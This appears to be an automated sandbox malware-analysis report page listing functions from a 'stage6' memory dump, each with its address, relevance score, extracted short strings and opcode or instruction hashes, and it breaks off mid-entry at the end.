Function 0041E7C0 Relevance: 5.8, Strings: 4, Instructions: 779COMMON

Download Yara Rule

Strings

hI, xrefs: 0041E98F
-+, xrefs: 0041F11A
", xrefs: 0041F121
/, xrefs: 0041E9BE

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: "$-+$/$hI
API String ID: 0-2772680581
Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A

Function 0042CA49 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB22 Relevance: 5.3, Strings: 4, Instructions: 299COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96

Function 0042CAD0 Relevance: 5.3, Strings: 4, Instructions: 295COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96

Function 0042CB11 Relevance: 5.3, Strings: 4, Instructions: 271COMMON

Download Yara Rule

Strings

,JHj, xrefs: 0042CD5D
bc, xrefs: 0042CE9D
Hs, xrefs: 0042CCE3
v, xrefs: 0042CDC6

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: ,JHj$Hs$bc$v
API String ID: 0-909542228
Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96

Function 00417DEE Relevance: 4.7, Strings: 3, Instructions: 998COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A
,, xrefs: 004183A1

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID: ,$i$r}A
API String ID: 2994545307-2114006112
Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796

Function 0041759F Relevance: 4.4, Strings: 3, Instructions: 671COMMON

Download Yara Rule

Strings

gfff, xrefs: 00417747
r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: gfff$i$r}A
API String ID: 0-3931832132
Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
Instruction Fuzzy Hash: 74028A76A483118BD724CF28D8817ABBBE2EBD2300F19852ED4C5D7392DB389945C786

Function 0041D380 Relevance: 4.2, Strings: 3, Instructions: 453COMMON

Download Yara Rule

Strings

|F, xrefs: 0041D40A
C], xrefs: 0041D471
34, xrefs: 0041D46A

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: 34$C]$|F
API String ID: 0-2804560523
Opcode ID: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction ID: 2c432fa7c5999ab476cb5019d0599193357fe59285c965ab9162d9f100ef16a5
Opcode Fuzzy Hash: 7bec5bc3369f6adcf9dfe2aa521af371a2ac693f70b7f14cbe9fa8a8d0a997b9
Instruction Fuzzy Hash: E2C1F1B59183118BC720CF28C8816ABB3F2FFD5314F58895DE8D58B390E778A945C79A

Function 0042DFE9 Relevance: 4.1, Strings: 3, Instructions: 332COMMON

Download Yara Rule

Strings

Ef, xrefs: 0042E24E
TQ][, xrefs: 0042E307
sWK), xrefs: 0042E049

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: Ef$TQ][$sWK)
API String ID: 0-3401374238
Opcode ID: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction ID: 19a0c778187f2748ae17dd07c5e08606c1358576a23e797e2c0b4f31c76305c1
Opcode Fuzzy Hash: 2018eb1ddcc6c4d2b6b82b9d22d54321858e2bd23606dd915e7f156b5046d053
Instruction Fuzzy Hash: CBB1C33061C3E08ED7398F2994507ABBBE09F97304F48499DD4D95B382DB79850ACBA7

Function 0041B2E0 Relevance: 4.0, Strings: 3, Instructions: 231COMMON

Download Yara Rule

Strings

_, xrefs: 0041B428
+|-~, xrefs: 0041B306
/pqr, xrefs: 0041B30E

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: +|-~$/pqr$_
API String ID: 0-1379640984
Opcode ID: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction ID: 042a524babaaaf1240c13a88dd3a117b8cd22f0ed9ec4b151ea40a3d869026f8
Opcode Fuzzy Hash: 4a5a7f83b503959aed81fc9274c5a394571bb0f6731898145231dc30ce1a0eba
Instruction Fuzzy Hash: D9810A5561495006DB2CDF3489A333BAAD79F84308B2991BFC995CFBABE93CC502874D

Function 0042DA53 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

0K), xrefs: 0042DF19
4*VP, xrefs: 0042DF24

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: 0K)$4*VP
API String ID: 0-3626284114
Opcode ID: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction ID: 79d6e082e0491a4045e5b840a95bb4df230d34c241beba690eb3c8ed7007ce5a
Opcode Fuzzy Hash: 7f9184ee53db8657b7211f9213731764c2e24f7097ca2d92dc8b3e88ab6ab3dd
Instruction Fuzzy Hash: 8FD12730A1C3D08ED7258F3994507ABBFE19FA7314F59896ED4C98B382C7798406CB66

Function 004179C1 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

r}A, xrefs: 00417D60
i, xrefs: 00417B2A

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID: i$r}A
API String ID: 2994545307-2976846027
Opcode ID: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction ID: bf893d2c0726f4e317e2b51d5e32a95bc91f637e65c50f94937d3483e244f6d9
Opcode Fuzzy Hash: 216b221475836e3855d1b8759aff26348fc53bb82e04dccbb46422255a771982
Instruction Fuzzy Hash: 4781A83694C351CFD710CF68D8806ABBBE2EBD2300F18496ED8D697252C7389985C7CA

Function 00418591 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418680
P<?, xrefs: 00418590

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: P<?$P<?
API String ID: 0-3449142988
Opcode ID: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction ID: 58e7122ac3cea56caf2700395258951e32a9ff530ffc896d1714b79e34f88e6e
Opcode Fuzzy Hash: 15a1e53f96b5dbffac6245dad95bb33219b4ef4f3549f5551b78542ea9aaefbe
Instruction Fuzzy Hash: 64312976A44310EFD7208F54C880BBBB7A6F789300F58D92ED5C9A3251DB745C84879B

Function 0043B1D0 Relevance: 1.9, Strings: 1, Instructions: 653COMMON

Download Yara Rule

Strings

f, xrefs: 0043B3F1

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction ID: 18f220f42ed12d3f8706e230857eda4cfb4a422739cf4bd3cfbe98504a66e541
Opcode Fuzzy Hash: 8e9e50587fb6b78e0fa4282dd31e32de0d85a4e7deb78124e5aaaf4c71ac60a2
Instruction Fuzzy Hash: 8512D3706083418FD715CF28C88176FB7E5EB89314F289A2EE6E597392D734DC058B9A

Function 0040DBD9 Relevance: 1.8, Strings: 1, Instructions: 528COMMON

Download Yara Rule

Strings

Dx, xrefs: 0040E139

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: Dx
API String ID: 0-3832465965
Opcode ID: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction ID: 5bb1130f72a98c6f233d2c217a903bc57bb56de3339a3108bfc93ec34e4a158e
Opcode Fuzzy Hash: ff34d217169f84ecf3502b05061dc3eb4241f1b5e2f3e4b9a9a76cc037eed5b2
Instruction Fuzzy Hash: A1F1CDB054C3D18ED335CF6594907EBBBE0EB92314F144AAEC8D96B382C735090A8B97

Function 00425E30 Relevance: 1.7, Strings: 1, Instructions: 431COMMON

Download Yara Rule

Strings

{}, xrefs: 00425F9D

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: {}
API String ID: 0-4269290415
Opcode ID: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction ID: 0af4e1219fe889d167e9da05173529857e0f89c87775fbd0e3160429af4db955
Opcode Fuzzy Hash: ae2110e227aeaa4557827879407c3dbec5839db0e2fe540aba91c9e8bccdbcdd
Instruction Fuzzy Hash: 82E101B5608340DFE724DF24E88176FB7B2FB85304F54893DE5859B2A2DB789805CB4A

Function 00438810 Relevance: 1.7, Strings: 1, Instructions: 426COMMON

Download Yara Rule

Strings

/,-, xrefs: 004388F5

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID: /,-
API String ID: 2994545307-1700940157
Opcode ID: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction ID: 73ea5f1ed436ac76404857fefd2ddfa4c8367646346d3918638d2e9e73e3d7e7
Opcode Fuzzy Hash: e68cf86ee166e556bd12f2f12a5a46f9bc2d0c12cb890ba0df125163a2fef21b
Instruction Fuzzy Hash: 8EB18E717083014BD714DF25888163BF792EBCA314F14A92EF5D557392DB39EC068B9A

Function 00416263 Relevance: 1.7, Strings: 1, Instructions: 405COMMON

Download Yara Rule

Strings

VtA, xrefs: 004163A1

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID: VtA
API String ID: 2994545307-3724035812
Opcode ID: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction ID: ed71193d6b2bdbbac52031f97d74cd30495a87e66650ae04c888d17f76a05038
Opcode Fuzzy Hash: e8c9bba709d658e790e2a6ad064546b7b8b5661d45e7256e4bece47e75e6f2c0
Instruction Fuzzy Hash: 5DC139766083419FD714CF28D8817AFB7E2AB95310F09892EE4D5D7392C738D885C75A

Function 0042B170 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042B36E

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: 33b1f2780e14060464d7ed180fcf8b3e4403934f6fcecc96c03af05ff21b71f5
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 4A71D732B083358BD714CE28E48432FB7E2EBC5750FA9856EE89497351D7389C4587CA

Function 0041D83A Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

klm, xrefs: 0041D9AC

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: klm
API String ID: 0-3800403225
Opcode ID: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction ID: fbab8d391cb70804594fb2969dbf4b57704b04da195ac2ac4d1ccbe35a174314
Opcode Fuzzy Hash: d5319d95fe68aebd98aaca92b9825a3df1dae6eff9af15c4fe87a1423c5b3b77
Instruction Fuzzy Hash: 9751F3B4A0D3508BD314EF25D81276BB7F2EFA6348F18856EE4D54B391E7398501CB1A

Function 00417380 Relevance: 1.4, Strings: 1, Instructions: 149COMMON

Download Yara Rule

Strings

?^A, xrefs: 00417450, 00417540

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID: ?^A
API String ID: 2994545307-4120214115
Opcode ID: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction ID: 9ee6d34e9011fc7addbd5ae762574014bc539ca284b22a695acd6cfcc742d02e
Opcode Fuzzy Hash: 2c308a6fbd29e83612078340da99c3c212b60cd104204cd4e1c6453a1b582895
Instruction Fuzzy Hash: 2141783A648300DFE3248B94D880ABBBBA3B7D5310F5D552EC5C527222CB745C81878F

Function 00428B61 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

$%, xrefs: 00428C20

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID: $%
API String ID: 0-4214564638
Opcode ID: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction ID: 3a12058a654eb28ab9a6ec9325260f0da8ac6e7581b620ea067b04d8af41a39e
Opcode Fuzzy Hash: d78bc3d5ce02b10deb2a392cf77ba543051be3d806e39ea4f7dd24e4e80accd5
Instruction Fuzzy Hash: 694124B0E022298BCB10CF99E8513AEB7B1FF55310F09825DE441AB790E7785941CB64

Function 0041682D Relevance: .8, Instructions: 761COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
Instruction ID: 1dcbf6391fd41f0c0a817e27e8bafbe762063cd3c7318eef4161125519cd5594
Opcode Fuzzy Hash: 0417c610e5770e3de08e3f27a6132ce354b413bedc9eba632381f23ebbae40da
Instruction Fuzzy Hash: 57424876A083518BD724CF29C8917ABB7E2EFC5310F19892EE4C597351DB38D845CB8A

Function 004074F0 Relevance: .6, Instructions: 611COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction ID: 7b72874d185f9504f09fa30b763c2e13130ca022e31a023e0d3144396e745bed
Opcode Fuzzy Hash: 83213a2729f592a7edcd98fc7886bfd8d55118cdf426f5e19ae94b324be42bba
Instruction Fuzzy Hash: 1012A372A0C7118BD725DE18D8806ABB3E1BFC4315F19893ED986A7385D738B8518B87

Function 004197C2 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction ID: ba4386b7c12eba82c1b0c1a845e92ae21c1426ac82d7aa641ba094e7d1c8bfda
Opcode Fuzzy Hash: 7d4a608daa09243b0b1664d6ac314f1ff4fa7c4c8c111b79aec593db6438873e
Instruction Fuzzy Hash: FE021671A083128BC724CF28C4A16ABB7F1EFE5350F19852DE8C99B351E7389D85C786

Function 004291DD Relevance: .5, Instructions: 549COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction ID: 8cc232c379ab24ad0e8e110b9e0577a2d66b898ca13c535210c4519ca42de900
Opcode Fuzzy Hash: 2253fead0949c94e28b23ae243de764efe372f7ce01ce19a162629ea64ece33e
Instruction Fuzzy Hash: ACF12771E003258BCF24CF58C8516ABB7B2FF95314F198199D896AF355E7389C41CB94

Function 00405990 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction ID: bb9b723667839a33c3fd076cb6daf547bf5b8942c047ca41cb9a19f1e1e822b5
Opcode Fuzzy Hash: 76f7eb2ea2dd7941e95dbf1f07b72685953879e74b7f78573d97f49de11c20aa
Instruction Fuzzy Hash: A3F1CC356087418FD724CF29C88066BFBE2EFD9300F08882EE5D597391E679E944CB96

Function 00415220 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction ID: 473c7c0e01890161c42436878ad5ddc7d20691f55e5b146572409273c410520a
Opcode Fuzzy Hash: e201d641cfe25c641c2468e7a3483f4a9060aee4472faa5ea81c6e7fcc7eb0d8
Instruction Fuzzy Hash: CAD1F575609700DBD3209F15D8417EBB3A5FFD6354F184A6EE8C98B391EB389840C79A

Function 00426B95 Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
Instruction ID: 8f62d820d698011493e9b4d33d56c28701bf8a730f1a894cccb9041d930e3295
Opcode Fuzzy Hash: 53eb30f04210c5aa1d7ea8e5a987f3c65e47ecdc85497fc231301112acc4fb82
Instruction Fuzzy Hash: A4B148B5E00565CFCF10CF59E8417AEB7B1AF0A304F5A407AD899AB342D7399D01CBA9

Function 0043F330 Relevance: .3, Instructions: 349COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
Instruction ID: 3d8e549ead381eb5a41ee94ce64dad1362128fe91ea456cb5e2966e39e4c66ca
Opcode Fuzzy Hash: 78baf6bead69bc787f6e498b6209c58df4768a7a1f3029cd250c3ec1940b1aee
Instruction Fuzzy Hash: A3B12536A083129BC724CF28C88056BB7E2FF99700F19953DEA8697366E735DC06D785

Function 00422190 Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction ID: a24f2a78553098ad8a5e3b5bc8abd089333314a4ae9ebed43d08ec28266042c4
Opcode Fuzzy Hash: 1235eeb8cf710a390d5557258a43f903d8b0ebafe0fc0a19c3d367544ede0ca8
Instruction Fuzzy Hash: 9D9126B1B04321ABD7209F20DD91B77B3A5EF91318F14482DE9869B381E7B9E904C75A

Function 0043EFB0 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
Instruction ID: 3187122ed07642cbe4dcf9e03264eeaa439871456ea8a6719abbd84e200541cd
Opcode Fuzzy Hash: 69f7ea7b3bcfd880a0eef8db25e79bddcc6229897a0f740fc9fa50f79ffe9049
Instruction Fuzzy Hash: 4EA11436A043018BC718DF28D99092BB3F2EBC9710F1A957DE9869B365EB35DC05CB46

Function 00429C2B Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
Instruction ID: 89cd8c3f6ac805753dcfa7ea52abb159a623b373aaffce4ab273b97bd3830c78
Opcode Fuzzy Hash: 6c996c3f4605880eb5795293c8fc84fa0ba55b563aa94cfbc2b65958c9b9224e
Instruction Fuzzy Hash: CFB10575608790DFD714DF24E891A2BB7E2EF8A314F488A6DF0D5872A2D7388905CB16

Function 0043ECA0 Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1378754829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_stage6.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
Instruction ID: cf6a0fb400f3c0121e69896af41eb3d2a2b4280c5d577effd33442f2baf9bc8c
Opcode Fuzzy Hash: 7757ad35b4d3f19014e5b0218f9aa537273a9f10abc5234e4bd6fc32e4c2e1b2
Instruction Fuzzy Hash: CB81AE326053019BC7249F29C85067FB3A2FFC8710F2AD42DE9868B395EB349C52D785

Function 0043AEC0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

